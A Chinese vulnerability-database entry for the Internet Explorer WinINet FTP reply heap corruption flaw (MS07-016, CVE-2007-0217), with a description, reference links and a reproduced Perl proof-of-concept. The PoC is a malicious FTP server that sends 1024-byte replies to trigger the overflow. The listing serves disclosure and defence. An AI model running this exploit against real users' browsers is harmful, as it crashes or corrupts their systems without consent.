Microsoft IE WinINet.DLL FTP服务器响应内存破坏漏洞(MS07-016)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112400 漏洞类型 边界条件错误
发布时间 2007-03-09 更新时间 2007-03-09
CVE编号 CVE-2007-0217 CNNVD-ID CNNVD-200702-237
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3444
https://www.securityfocus.com/bid/22489
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-237
|漏洞详情
InternetExplorer是微软发表的非常流行的WEB浏览器。InternetExplorer在解析远程FTP服务器的回复行时存在内存破坏漏洞,远程者可能利用此漏洞对IE客户端执行拒绝服务攻击或执行任意指令。在FTP会话期间,客户端请求服务器执行某些操作,服务器会用数字代码、可读消息或其他信息响应请求。由于回复中可能包含有多行,因此客户端中的代码将回复拆分为多行,在行字符的末尾添加空字节(0x00)。如果某行恰好在回复缓冲区的最后一个字符结束的话,就会将终止的空字节写入到所分配空间之外,覆盖一个字节的堆管理结构。攻击者可以通过向客户端发送一系列特制的回复破坏堆,导致执行任意指令。
|漏洞EXP
#!/usr/bin/perl

# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
#                  or at '\r\n'. Each buffer is apended with \x00, without
#                  bounds checking.  If the response is exctly 1024 characters
#                  in length, you will overflow the heap with the string \x00.


use IO::Socket;
use strict;

# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1,
                                 LocalHost=>$ip,
                                                     LocalPort=>'21',
                                                             Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");

# Wait for initial connection and send banner
my $sock_in = $sock->accept();
print $sock_in "220 waa waa wee waa\r\n";

# Send response code with total lenght of response = 1024
while (<$sock_in>){
       my $response;
       if($_ eq "USER") { $response="331 ";}
       elsif($_ eq "PASS") { $response="230 ";}
       elsif($_ eq "syst") { $response="215 ";}
       elsif($_ eq "CWD") { $response="250 ";}
       elsif($_ eq "PWD") { $response="230 ";}
       else { $response="200 ";}
       print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
}
close($sock);

# milw0rm.com [2007-03-09]
|受影响的产品
Nortel Networks Symposium Network Control Center (NCC) Nortel Networks Contact Center Manager Server 0 Nortel Networks Contact Center Manager Nortel Networks Contact Center Express Nor
|参考资料

来源:US-CERT
名称:VU#613564
链接:http://www.kb.cert.org/vuls/id/613564
来源:US-CERT
名称:TA07-044A
链接:http://www.us-cert.gov/cas/techalerts/TA07-044A.html
来源:MS
名称:MS07-016
链接:http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx
来源:SECTRACK
名称:1017642
链接:http://www.securitytracker.com/id?1017642
来源:BID
名称:22489
链接:http://www.securityfocus.com/bid/22489
来源:OSVDB
名称:31892
链接:http://www.osvdb.org/31892
来源:VUPEN
名称:ADV-2007-0584
链接:http://www.frsirt.com/english/advisories/2007/0584
来源:SECUNIA
名称:24156
链接:http://secunia.com/advisories/24156
来源:IDEFENSE
名称:20070213Microsoft'wininet.dll'FTPReplyNullTerminationHeapCorruptionVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=473
来源:BUGTRAQ
名称:20070309MS07-016FTPResponseDOSPoC
链接:http://www.securityfocus.com/archive/1/archive/1/462303/100/0/threaded
来源:USGovernmentResource:oval:org.mitre.oval:def:1141
名称:oval:org.mitre.oval:def:1141
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:1